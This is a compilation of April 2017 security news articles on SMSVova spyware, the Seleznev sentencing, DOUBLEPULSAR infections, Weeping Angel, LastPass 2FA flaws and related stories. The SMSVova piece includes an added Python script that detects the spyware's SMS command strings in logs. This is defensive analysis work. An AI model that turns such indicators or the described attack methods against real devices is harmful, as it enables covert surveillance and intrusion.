
Fake app hiding the SMSVova spyware went undetected for years in the Google Play Store
23.4.2017 securityaffairs Android

Millions of users looking for software updates have downloaded an app hiding spyware called SMSVova through the official Google Play store.
Bad news for millions of Android users looking for software updates: they have been tricked into downloading spyware called SMSVova through the official Google Play store.

Experts at Zscaler discovered that the bogus app was posing as a legitimate application called “System Update” and claiming to provide users with access to the latest Android software release.


It has been estimated that the fake application hiding the SMSVova spyware was uploaded to Google Play in 2014 and has been downloaded between 1,000,000 and 5,000,000 times.

Experts reported the discovery to Google, which promptly removed the app from the store.

The SMSVova spyware was developed to track the physical location of its victims; attackers control it via SMS messages.

“In our ongoing effort to hunt malware, the Zscaler ThreatLabz team came across a highly suspicious app on the U.S. Google Play Store that has been downloaded between one and five million times since 2014,” reads the analysis published by Zscaler. “Upon analysis, we found it to be an SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time.”

According to Zscaler, once the app was installed, users who tried to open it were shown the message:

‘Unfortunately, Update Service has stopped.’


The app then hides itself from the main screen and launches its MyLocationService, which collects location data and stores it in the Shared Preferences directory of the mobile device.

Despite the error message, the spyware sets up an Android service and a broadcast receiver:

MyLocationService: fetches the last known location
IncomingSMS (receiver): scans incoming SMS messages

SMSVova monitors incoming SMS messages with specific characteristics: messages longer than 23 characters that contain the text strings “vova-” and “get faq.”

“Once the spyware has been installed on the victim’s device, an attacker can send an SMS message ‘get faq’ and this spyware will respond with a set of commands,” according to Zscaler.

The SMSVova spyware implements other commands, including “changing current password” and “setting low battery notification.” According to Zscaler’s Desai, those behind the spyware use the SMS commands to instruct SMSVova to retrieve and text back location data. The “setting low battery notification” message instructs the phone to text location data when the battery runs low.
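The SMS characteristics above (a body longer than 23 characters carrying “vova-”, and the “get faq” probe) are enough to write a defender-side check that flags operator traffic in an SMS log. The following is an added example, not Zscaler’s code or the spyware’s own; the log line format and the sample messages are constructed for the demo, and the decision to flag “get faq” on its own (it is shorter than the length threshold) is an assumption.

```python
"""Detection helper for the SMSVova SMS command pattern.

Added example, not Zscaler's analysis code or the spyware's own code.
It scans constructed SMS log lines for the operator traffic the article
describes: bodies longer than 23 characters carrying the "vova-" marker,
and the "get faq" command. The log format is an assumption for this demo.
"""
import re
from dataclasses import dataclass, field
from typing import List

VOVA_MARKER = "vova-"        # marker string the receiver looks for, per the article
FAQ_COMMAND = "get faq"      # command that makes the implant list its commands
MIN_BODY_LEN = 23            # body length threshold reported by Zscaler

# Assumed log format: "<timestamp> <sender> <IN|OUT> <body>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<sender>\S+) (?P<dir>IN|OUT) (?P<body>.*)$")


@dataclass
class Finding:
    timestamp: str
    sender: str
    body: str
    indicators: List[str] = field(default_factory=list)


def check_sms(body: str) -> List[str]:
    """Return the SMSVova indicators matched by one message body.

    The "vova-" marker only counts when the body also clears the
    23-character length threshold; "get faq" is flagged on its own
    because the attacker sends it as a short probe (assumption).
    """
    lowered = body.lower()
    hits = []
    if len(body) > MIN_BODY_LEN and VOVA_MARKER in lowered:
        hits.append("vova-marker")
    if FAQ_COMMAND in lowered:
        hits.append("get-faq-command")
    return hits


def scan_sms_log(lines) -> List[Finding]:
    """Parse log lines and return one Finding per message that matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        hits = check_sms(m["body"])
        if hits:
            findings.append(Finding(m["ts"], m["sender"], m["body"], hits))
    return findings


# Constructed sample log: a benign message, a short "vova-" string that
# misses the length threshold, a long marker message, and a "get faq" probe.
SAMPLE_LOG = [
    "2017-04-20T10:12:33 +15550001111 IN see you at 7 tonight",
    "2017-04-20T10:13:01 +15550002222 IN vova-x",
    "2017-04-20T10:14:45 +15550002222 IN vova-demo constructed command text",
    "2017-04-20T10:15:10 +15550002222 IN get faq",
]


def scan_sample() -> List[Finding]:
    """Run the scan over the constructed sample log."""
    return scan_sms_log(SAMPLE_LOG)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f.timestamp} {f.sender} {f.indicators}: {f.body!r}")
```

Only the sender that issued the long marker message and the probe is reported; the short "vova-x" body falls under the length threshold and is ignored.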

It is still a mystery why the threat actor behind the spyware is collecting location data.

It is interesting to note that the SMS-based behavior and the exception raised at the initial stage of startup were not detected by the antivirus engines on VirusTotal.

The authors of the SMSVova spyware designed the threat to evade detection by antivirus solutions and Google Play’s malware detector. The app was last updated in December 2014; at that time the controls implemented by Google were less stringent, but the malicious code still eluded Google’s detector for years.

It is curious to note that according to the recent Google Android Security 2016 Year In Review report, in 2016 devices that installed applications only from Google Play had fewer than 0.05 percent of potentially harmful applications installed.

“There are many apps on the Google Play store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app we analyzed for this report,” concluded the analysis.


US Court sentenced Russian hacker Roman Seleznev to 27 years in jail for hacking
23.4.2017 securityaffairs Crime

Roman Seleznev, the son of the prominent Russian Parliament member Valery Seleznev, was sentenced to 27 years in jail for hacking.
The Russian hacker Roman Seleznev, aka Track2, was sentenced to 27 years in prison; he was convicted of causing $170 million in damage by hacking into point-of-sale systems.

This sentence is the longest one ever imposed in the United States for a hacking-related case.

Seleznev’s defense attorney Igor Litvak argued that a 27-year prison sentence is absolutely inappropriate for cyber theft.

Roman Seleznev is the son of Valery Seleznev, one of Russia’s most prominent lawmakers and a member of the Russian Parliament.


According to prosecutors, Seleznev targeted computers belonging to both small businesses and large financial institutions. Authorities arrested him in the Maldives in 2014 and seized his laptop, which contained more than 1.7 million credit card numbers.

The Russian Foreign Ministry judged the extradition to the US as a “kidnapping” and against all norms of international law.

The stolen credit card data were offered for sale on multiple “carding” websites.

After an August 2016 trial, Seleznev was convicted on 38 counts:

10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft

“A 32-year-old Vladivostok, Russia, man was sentenced today to 27 years in prison for his computer hacking crimes that caused more than $169 million in damage to small businesses and financial institutions, announced Acting Assistant Attorney General Kenneth A. Blanco of the Justice Department’s Criminal Division and U.S. Attorney Annette L. Hayes of the Western District of Washington.”

“Roman Valeryevich Seleznev, aka Track2, was convicted in August 2016, of 38 counts related to his scheme to hack into point-of-sale computers to steal credit card numbers and sell them on dark market websites. U.S. District Judge Richard A. Jones of the Western District of Washington imposed the sentence.” reads the press release published by the DoJ.

In federal court in Seattle, prosecutors asked for a 30-year prison term because Roman Seleznev “became one of the most revered point-of-sale [POS] hackers in the criminal underworld.”

Roman Seleznev was the mastermind behind a profitable hacking scheme that used automated techniques to break into POS systems and deliver malware that stole credit card data.
According to prosecutors, his hacking campaign hit more than 3,700 businesses.

“Many of the businesses targeted by Seleznev were small businesses, and included restaurants and pizza parlors in Western Washington, including Broadway Grill in Seattle, which was forced into bankruptcy following the cyber assault. Testimony at trial revealed that Seleznev’s scheme caused approximately 3,700 financial institutions more than $169 million in losses.” continues the press release.

Roman Seleznev asked US District Court Judge Richard Jones for clemency on account of his medical issues, explaining that he had been injured in a 2011 terrorist bombing in Morocco.

Jones rejected Seleznev’s argument and told him that the Morocco bombing “was an invitation to right your wrongs and recognize you were given a second chance in life,” but that instead he “amassed a fortune” at the expense of thousands of small businesses.

“Today is a bad day for hackers around the world,” said U.S. Attorney Annette L. Hayes. “As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind.”

“Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands,” Hayes added.

Russian MP Valery Seleznev said the sentence was “passed by man-eaters” and that his son had been “abducted.”

“My son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent,” he told the RIA Novosti news agency.


US Court Sentences Russian Lawmaker's Son to 27 Years in Jail for Hacking
22.4.2017 thehackernews Crime
The son of a prominent Russian lawmaker was sentenced on Friday by a US federal court to 27 years in prison after being convicted of stealing millions of US credit card numbers and causing some $170 million in damages to businesses and individuals.
This sentence is so far the longest sentence ever imposed in the United States for a hacking-related case.
Roman Valeryevich Seleznev, 32, the son of a Russian Parliament member of the nationalist Liberal Democratic Party (LDPR), Valery Seleznev, was arrested in 2014 while attempting to board a flight in the Maldives and then extradited to the United States.
Upon arrest, federal authorities retrieved a computer that contained over 1.7 million stolen credit card numbers.
Seleznev, who also went by the moniker 'Track2' online, was convicted in August 2016 of 38 charges related to stolen credit card details, including:
10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft

Longest Ever Hacking-Related Sentence in the United States

In federal court in Seattle, the government asked for a 30-year prison term for 38 counts, saying Seleznev not only helped grow the market for stolen credit card data but also "became one of the most revered point-of-sale [POS] hackers in the criminal underworld."
Seleznev – and potentially other cyber criminals who are unknown to the authorities – developed a hacking scheme that used automated techniques to hack into POS machines in retailers and install malware to steal copies of credit card numbers.
The lists of millions of stolen credit card numbers were then sold on various online "carding" websites and the dark web. Prosecutors said his hacking campaign hit more than 3,700 businesses.
Before his sentencing, Seleznev asked US District Court Judge Richard Jones for leniency, urging the judge to consider his medical issues, the result of being caught up in and injured by a 2011 terrorist bombing, in deciding his prison term.
However, Jones told Seleznev that the Morocco bombing "was an invitation to right your wrongs and recognize you were given a second chance in life," but instead, you "amassed a fortune" at the expense of thousands of small businesses.
"Today is a bad day for hackers around the world," said U.S. Attorney Annette L. Hayes. "As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind."
"Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands," Hayes added.
Russian MP: Sentence "Passed by Man-Eaters;" My Son is innocent!
Twenty-seven years in prison is an absolutely inappropriate sentence for cyber theft, Seleznev's defense attorney Igor Litvak stated on Friday.
Seleznev's arrest in the Maldives and then extradition to the United States sparked an international dispute between American and Russian authorities. The Russian Foreign Ministry even characterized the extradition as a "kidnapping" and against all norms of international law.
Russian MP Valery Seleznev, the father of Seleznev, said the sentence was "passed by man-eaters" and that his son was "abducted."
The Russian MP added that his "son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent."
Mr. Seleznev also said that he viewed the 27-year prison sentence as a life sentence because his son would never survive that many years in prison.


Chinese APTs targeted the South Korean THAAD anti-missile systems
22.4.2017 securityaffairs APT

According to researchers at FireEye, Chinese hackers targeted the South Korean Terminal High Altitude Area Defense (THAAD) missile system.
According to a new investigation conducted by security firm FireEye, Chinese hackers are trying to break into systems used by the South Korean military in order to interfere with the deployment of an anti-ballistic missile system.

The news was confirmed by FireEye’s director of cyber-espionage analysis, John Hultquist, in an interview with the Wall Street Journal.

FireEye has observed cyber attacks aimed at the Terminal High Altitude Area Defense (THAAD) missile system. The THAAD system was designed to protect South Korea from incoming intercontinental ballistic missiles (ICBMs); it is part of the Star Wars defense system.

South Korea is deploying Lockheed Martin’s THAAD missile defense system (image source: Ars Technica)

China has opposed the deployment of THAAD ever since South Korea announced it as a key component of its defense infrastructure.

“China opposes Thaad, saying its radar system can reach deep into its own territory and compromise its security. South Korea and the U.S. say Thaad is purely defensive. The first components of the system arrived in South Korea last month and have been a key issue in the current presidential campaign there.” reported the WSJ.

According to FireEye, at least two different Chinese hacking crews were involved in cyber attacks against South Korean military systems linked in some way to the design and deployment of THAAD.

The two teams involved in the attack are the Tonto team and the notorious APT10.

“One of the two hacker groups, which FireEye dubbed Tonto Team, is tied to China’s military and based out of the northeastern Chinese city of Shenyang, where North Korean hackers are also known to be active, said Mr. Hultquist, a former senior U.S. intelligence analyst.” continues the WSJ. “FireEye believes the other, known as APT10, may be linked to other Chinese military or intelligence units.”

The hackers launched spear phishing attacks using messages with weaponized attachments. According to FireEye, at least one person fell victim to the attacks; FireEye was nevertheless able to profile the threat actors and track the APTs’ movements.

“Mr. Hultquist added that an error in one of the group’s operational security provided FireEye’s analysts with new information about the group’s origins.”

China’s Ministry of Defense recently declared that People’s Liberation Army “has never supported any hacking activity.”


Hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
22.4.2017 securityaffairs BigBrothers

A security researcher warns that hackers have compromised thousands of Windows boxes using the leaked NSA hacking tools DOUBLEPULSAR and ETERNALBLUE.
Security expert Dan Tentler, the founder of security shop Phobos Group, has observed a significant increase in the number of Internet-exposed Windows boxes that have been hacked with the DOUBLEPULSAR backdoor. The compromised Windows boxes have been used for several criminal purposes, such as delivering malware or sending spam.

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system; it is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that triggers remote code execution in older versions of Windows (Windows XP to Server 2008 R2).

Every Windows machine running an old, vulnerable version that exposes an SMB service is at risk of compromise.

DOUBLEPULSAR and ETERNALBLUE are now available to anyone since the archive of NSA tools was leaked online.

Microsoft recently patched the SMB Server vulnerability (MS17-010) exploited by ETERNALBLUE; the security updates were released for Windows Vista SP2, Windows 7, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, and Server Core.

According to Tentler, who scanned the Internet for vulnerable Windows boxes, 15,196 systems have already been compromised, most of them in the US.

The expert also observed that the number of infections continues to increase.

Windows boxes compromised with the DOUBLEPULSAR implant can be easily identified by observing the response to a special ping sent to port 445.


“I’m hopeful this is the wakeup moment for people over patching Windows machines,” said Tentler.

According to Tentler, over the Easter weekend script kiddies worldwide launched a massive attack leveraging DOUBLEPULSAR.

The experts have no doubt that the number of DOUBLEPULSAR attacks will continue to increase in the coming week.


Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs

22.4.2017 thehackernews  BigBrothers

Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.
Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, allegedly belonging to the NSA's Equation Group.
What's Worse? Microsoft quickly downplayed the security risks by releasing patches for all exploited vulnerabilities, but there are still risks in the wild with unsupported systems as well as with those who haven't yet installed the patches.
Multiple security researchers have performed mass Internet scans over the past few days and found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant, as a result of a free tool released on GitHub for anyone to use.
Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.
A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.
The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.
Therefore, to compromise a machine, it must be running a vulnerable version of the Windows OS with an SMB service exposed to the attacker.
Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.
Once installed, DoublePulsar uses hijacked computers to sling malware, spam online users, and launch further cyber attacks on other victims. To remain stealthy, the backdoor doesn't write any files to the PCs it infects, which also prevents it from persisting after an infected PC is rebooted.
While Microsoft has already patched the majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.
Moreover, systems that are still using end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer receive security updates, are also vulnerable to the in-the-wild exploits.
Since it takes hackers roughly a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver hacking exploits, researchers are expecting more vulnerable and unpatched computers to fall victims to DoublePulsar.
After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."
Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.


Tanium Blasted for Using California Hospital Network for Sales Demos

22.4.2017 securityweek Security
Tanium Accused of Exposing California Hospital’s Network in Sales Demos Without Client Permission

Earlier this week, Orion Hindawi, CEO of systems and security management company Tanium, published an open letter covering two issues of current 'bad press'. The first is that Tanium has a toxic staff relations culture. Hindawi denies this: "Mission-oriented, hard-charging, disciplined, even intense, but not toxic."

The second issue is less easy to dismiss. It stems from an initial report in The Wall Street Journal, subsequently picked up by numerous other media outlets.

"For years, cybersecurity startup Tanium Inc. pitched its software by showing it working in the network of a hospital it said was a client..." wrote the WSJ. The problem here is that the demo was live and uncensored, giving out details of the client's name (the El Camino Hospital in Mountain View, California) and IT infrastructure, apparently without authorization to do so.

'Start-up' is a misleading description: Tanium is neither new (it was founded ten years ago), nor small (it was last valued at $3.5 billion). It has, however, been growing rapidly; and that might be part of the problem. In May 2014 it raised $90 million in funding from Silicon Valley VC firm Andreessen Horowitz, and added a further $52 million in March 2015.

"When you start to develop a new product," Stuart Okin, SVP of Product at 1E told SecurityWeek, "the very first thing you do is solve the problem of how you are going to demonstrate it." 1E spent three months solving this problem at the start of developing Tachyon, a competing product that bears some similarities to Tanium.

Both products must scale to huge numbers, and need to be able to demonstrate this ability. Okin's solution was to develop an in-house emulator using virtual machines. Tanium doesn't seem to have had such a plan. Exactly what happened isn't clear, beyond that Tanium seems to have had a direct link into the hospital's system and was able to demonstrate the product in action, live.

In doing so, viewers would have been able to discover information about the network's infrastructure and its strengths and weaknesses -- knowledge that would have been invaluable to a potential attacker. In his letter, Hindawi acknowledges mistakes. Without mentioning El Camino, he writes, "We should have done better anonymizing that customer’s data."

But he also makes the point, "Other than the few customers who have signed those documents [allowing Tanium demonstrations] and provided us remote access to their Tanium platforms, we do not -- and in fact cannot -- demonstrate customer environments with Tanium." This implies that someone at El Camino provided the physical connection that allowed the Tanium demonstrations.

But the hospital denies this. In a separate statement, a spokesperson said, "El Camino Hospital was recently made aware that Tanium, a former third-party vendor that provided a desktop management program, had been using hospital desktop and server management information as part of a sales demonstration. El Camino Hospital was not aware of this usage and never authorized Tanium to use hospital material in any sales material or presentation."

Clearly, these two statements do not align. "This is a very embarrassing incident for the cybersecurity industry, as it undermines trust towards the large and reputable players," High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek. "However, anyone can make a mistake, and prior to any conclusions or accusations, a thorough investigation should be duly performed. Many successful companies become victims of their own success -- it’s very challenging to maintain skyrocketing growth and assure that every employee respects all the internal procedures and policies in their integrity. In the cybersecurity industry, this problem is especially important, as startups grow very quickly and handle extremely sensitive data. I hope that all companies, not just Tanium, will learn a lesson and revise their internal policies and their practical enforcement."

Mistakes were certainly made, but the bottom line is that it should never have happened. "Using live customer environments for demos is a rookie move, and certainly not representative of standard practice among security software vendors," commented Okin. "There are established protocols for this -- such as demo rigs in the cloud. The 'wild west' startup approach doesn't fly in the security space, especially as these products and solutions are there to protect information, and you often find yourself engaged in heavily regulated environments."

He added that security companies should never be able to VPN into clients' infrastructures, unless it is an essential part of the service offered. This incident, he said, breaks the essential trust that is necessary between security vendor and client.


WikiLeaks Details Samsung Smart TV Hacking Tool

22.4.2017 securityweek BigBrothers
WikiLeaks has released a document detailing yet another hacking tool allegedly used by the U.S. Central Intelligence Agency (CIA). This time, the organization has published information on a tool designed to record audio via the built-in microphone of some Samsung smart TVs.

The tool, dubbed “Weeping Angel,” is apparently based on “Extending,” an implant allegedly developed by British security service MI5 – the agencies are said to have worked together on this project.

Some information on Weeping Angel was made public by WikiLeaks as part of the first Vault 7 dump, and the organization has now decided to also release a user guide.

The newly released guide, dated February 2014, describes an implant for Samsung F series smart TVs. The implant can record audio from a device via the built-in microphone and either store or exfiltrate the recordings.

The Weeping Angel implant can be installed by connecting a USB device to the targeted TV, and data can be exfiltrated either via a USB stick or a compromised Wi-Fi hotspot. However, previously leaked documents showed that its developers had been planning to add more data theft capabilities, including for browser data and Wi-Fi credentials, and even exploiting available remote access features.

SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

Last week, WikiLeaks released six documents describing a project named HIVE, which the CIA allegedly used to exfiltrate information from compromised machines and send commands to the malware found on these devices.

The whistleblower organization has also detailed hacking tools targeting security products, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

While WikiLeaks has offered to share the exploits it possesses with affected tech companies, most firms don’t seem willing to comply with WikiLeaks’ conditions for obtaining the files. Furthermore, an analysis of the available information showed that many of the vulnerabilities have already been patched.

U.S. authorities have neither confirmed nor denied the authenticity of the Vault 7 files, but reports say both the CIA and the FBI are hunting for an insider who may have provided the information to WikiLeaks.

Researchers at Symantec and Kaspersky have found links between the leaked Vault 7 files and the tools used by a cyber espionage group tracked by the security firms as Longhorn and The Lamberts, respectively.


MasterCard launches Credit Card with Built-In Fingerprint Scanner
21.4.2017 thehackernews Safety
MasterCard has unveiled its brand new payment card that has a built-in biometric fingerprint scanner, allowing customers to authorize payments with their fingerprint, without requiring a PIN code or a signature.
The company is already testing the new biometric payment cards, combined with the on-board chips, in South Africa and says it hopes to roll out the new cards to the rest of the world by the end of 2017.
Don't Worry, It Still Supports PIN-based Transactions as Fallback
Wait — If you think that this feature would not allow you to share your card with your child and spouse, don’t worry — Mastercard has a solution for this issue as well.
The company has confirmed that even when the card is configured to expect a fingerprint to authenticate a purchase, it still has a PIN as a fallback, in case the EMV reader fails to read the fingerprint for some reason or you have handed the card to your child for shopping.
Stores & Retailers Don't Need New Hardware
According to Mastercard, the new biometric payment card will not require store owners and businesses to buy any new hardware, like fingerprint scanners, because the sensor in the card reads your fingerprint.
Since both the data and the scanner exist on the same card, the new payment cards work with existing EMV card terminal infrastructure — the standard chip/swipe readers you can find at many stores these days, though old magnetic stripe-only terminals won't be compatible.
But, Banks Need to Adopt New Technology
Before these new cards can be adopted worldwide, your bank or financial institution will have to get on board with the new tech.
If you want the new biometric card, you are currently required to go to your bank branch in order to have your fingers scanned and registered for the new tech. Your fingerprints will then be converted into an encrypted digital template that is stored on the card's EMV chip.
You can save up to two fingerprints, but both would have to be yours — you cannot authorise someone else, even a family member, to use your card with their fingers.

Once your templates are saved, your card is ready to be used at compatible terminals across the world.
Merchants don't have to purchase new equipment to accept your fingerprint-enabled payment card, but will have to update their existing terminals to use the new tech.
Now, while shopping at any store, just place your biometric payment card into a retailer's EMV terminal and then put your finger on the embedded sensor to pay. Your fingerprints will be verified against a template stored on your card to approve your transaction.
Can Fingerprints be Forged? And Other Concerns...
This new card is an attempt to make face-to-face payments more convenient and more secure, but this type of biometric verification is useless when it comes to online shopping, and so provides no protection against card-not-present credit card fraud.
"Whether unlocking a smartphone or shopping online, the fingerprint is helping to deliver additional convenience and security," MasterCard security chief Ajay Bhalla said. "[A fingerprint is] not something that can be taken or replicated and will help our cardholders get on with their lives knowing their payments are protected."
But that isn't true.
Fingerprints can be faked, unfortunately, and previous research has shown that high-resolution images can be used to make fake fingerprints for malicious purposes. So, criminals could put a fake fingerprint on top of their finger to shop with stolen cards.
In addition to biometric cards, MasterCard is also planning to bring contactless payments, which should function similar to mobile payments like Apple Pay where users authenticate themselves via fingerprint while holding their smartphones against the terminal.


Corporate Users Increasingly Targeted With Exploits: Kaspersky

21.4.2017 securityweek Exploit
A report published by Kaspersky Lab on Thursday shows that the number of attacks involving exploits increased significantly in 2016 compared to the previous year, but the number of attacked users actually dropped.

The security firm observed more than 700 million attempts to execute an exploit in 2016, which represents a 25% increase compared to 2015. However, the number of users attacked was only 4.3 million, compared to nearly 5.5 million in the previous year.

This indicates that while fewer users encountered exploits, the likelihood of coming across an exploit increased as the number of websites and spam messages delivering such threats has continued to grow.

Of all the exploit attacks observed by Kaspersky in 2016, more than 15% were aimed at corporate machines. The number of targeted corporate users increased from 538,000 in 2015 to 690,000 in 2016.

While Windows and web browsers were the most targeted applications in both 2015 and 2016, their share decreased significantly last year, making more room for Android and Microsoft Office exploits.

“Exploits for vulnerabilities in Office software became the absolute champions in terms of the number of attacked users. They increased by almost 103% to reach 367,167 attacked users,” Kaspersky said in its report.

The security firm said more than 297,000 users were hit by zero-day or heavily obfuscated known exploits in 2016, and the most common exploit, same as in the previous year, was CVE-2010-2568, a vulnerability leveraged by the notorious Stuxnet malware.

Between 2010 and 2016, malicious actors used more than 80 vulnerabilities in targeted attacks. The Russia-linked threat group known as APT28 and Fancy Bear leveraged 25 flaws, including at least six zero-days, followed by the NSA-linked Equation Group, which used roughly 17 vulnerabilities, including at least eight zero-days.

Groups that launched targeted attacks have mainly relied on Windows flaws, followed by Flash Player, Office, Java and Internet Explorer. The most popular vulnerability is CVE-2012-0158, which is still being used by APT actors.

Usage of exploits by APT groups


The Stuxnet vulnerability is still one of the most exploited flaws in the wild by hackers
21.4.2017 securityaffairs CyberWar

A new report published by Kaspersky confirms that the exploit for the Windows Shell vulnerability used by Stuxnet is still widely adopted by threat actors.
The case that I’m going to present to you demonstrates the importance of patch management and shows the effects of the militarization of cyberspace.

Unpatched software is an easy target for hackers that can exploit old vulnerabilities to compromise the systems running them. Let’s consider for example the exploit code used in the notorious Stuxnet cyber weapon that hit the centrifuges at the Iranian nuclear plant at Natanz.
The flaw exploited by the Stuxnet worm was first patched by Microsoft in 2010, but threat actors in the wild continue to exploit it in a huge number of cyber attacks.

According to Kaspersky Lab, the flaw used by Stuxnet to target Windows machines, tracked as CVE-2010-2568, has been weaponized to remotely execute code on unpatched Windows computers.

The dangerous trend continues, in August 2014 experts from Kaspersky revealed that in the period between November 2013 and June 2014, the Windows Shell vulnerability (CVE-2010-2568) exploited by Stuxnet was detected 50 million times targeting nearly 19 million machines all over the world.

In 2015 and in 2016, roughly one in four Kaspersky users was targeted by exploit code leveraging CVE-2010-2568.

“To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.” states a report published by Kaspersky.

Stuxnet attack

Of course, the CVE-2010-2568 vulnerability only affects old operating systems, including Windows XP and Windows Server 2008, and unpatched versions of Windows 7.

Attackers mostly used the Stuxnet exploit code in malware that can “self-replicate” over a targeted network.

In conclusion, the militarization of cyberspace has serious consequences for Internet users, even when the malware was spread many years ago.

I suggest reading the research published by Kaspersky, which provides interesting data on the most exploited vulnerabilities and the threat actors leveraging them.


Arrest of WikiLeaks's Assange a 'Priority': US Top Cop

21.4.2017 securityweek BigBrothers
The arrest of WikiLeaks founder Julian Assange is a US "priority," Attorney General Jeff Sessions said Thursday, as media reports indicated his office was preparing charges against the fugitive anti-hero.

"We are going to step up our effort and already are stepping up our efforts on all leaks," Sessions, America's top cop, said at a news conference in response to a reporter's question about a US priority to arrest Assange.

The Justice Department chief said a rash of leaks of sensitive secrets appeared unprecedented.

"This is a matter that's gone beyond anything I'm aware of. We have professionals that have been in the security business of the United States for many years that are shocked by the number of leaks and some of them are quite serious," he said.

"Whenever a case can be made, we will seek to put some people in jail."

Prosecutors in recent weeks have been drafting a memo that looks at charges against Assange and members of WikiLeaks that possibly include conspiracy, theft of government property and violations of the Espionage Act, the Washington Post reported, citing unnamed US officials familiar with the matter.

Several other media outlets also cited unnamed officials as saying US authorities were preparing charges against Assange. The Justice Department declined to comment on the reports.

Assange, 45, has been holed up at the Ecuadoran embassy in London since 2012 trying to avoid extradition to Sweden where he faces a rape allegation that he denies.

He fears Sweden would extradite him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents that first gained attention in 2010.

Assange's case returned to the spotlight after WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and the Democratic party.

US officials say the emails were hacked with the aid of the Russian government in its bid to influence the US election.

Critics say their release late in the race helped to tip the November 8 election to Republican Donald Trump.

Trump and his administration have put heat on WikiLeaks after it embarrassed the Central Intelligence Agency last month by releasing a large number of files and computer code from the spy agency's top-secret hacking operations.

The documents showed how the CIA exploits vulnerabilities in popular computer and networking hardware and software to gather intelligence.

Supporters of WikiLeaks say it's practicing the constitutional right of freedom of speech and the press.

- 'Hostile intelligence service'-

CIA Director Mike Pompeo last week branded WikiLeaks a "hostile intelligence service," saying it threatens democratic nations and joins hands with dictators.

Pompeo focused on the anti-secrecy group and other leakers of classified information like Edward Snowden as one of the key threats facing the United States.

"WikiLeaks walks like a hostile intelligence service and talks like a hostile intelligence service. It has encouraged its followers to find jobs at CIA in order to obtain intelligence... And it overwhelmingly focuses on the United States, while seeking support from anti-democratic countries and organizations," said Pompeo.

"It is time to call out WikiLeaks for what it really is -- a non-state hostile intelligence service often abetted by state actors like Russia."

The day before Pompeo spoke, Assange published an opinion piece in The Washington Post in which he said his group's mission was the same as America's most respected newspapers: "to publish newsworthy content."

"WikiLeaks's sole interest is expressing constitutionally protected truths," he said, professing "overwhelming admiration for both America and the idea of America."


Flaws Allowed Hackers to Bypass LastPass 2FA

21.4.2017 securityweek Vulnerebility
LastPass vulnerabilities

Design flaws in LastPass’ implementation of two-factor authentication (2FA) could have been exploited by hackers to bypass the protection mechanism and gain access to user accounts.

Martin Vigo, one of the Salesforce researchers who in November 2015 reported finding several vulnerabilities in LastPass, has once again analyzed the popular password manager, particularly its 2FA mechanism.

The temporary 2FA codes are generated based on several variables, including a secret seed which is typically encoded in a QR code that the user scans with a 2FA app such as Google Authenticator.

Vigo’s tests showed that the request made when a QR code image was displayed to the user contained the login hash used by LastPass for authentication. In fact, the 2FA secret seed had been derived from the user’s password, which defeated the entire purpose of 2FA protection as the attacker presumably already possesses the password.

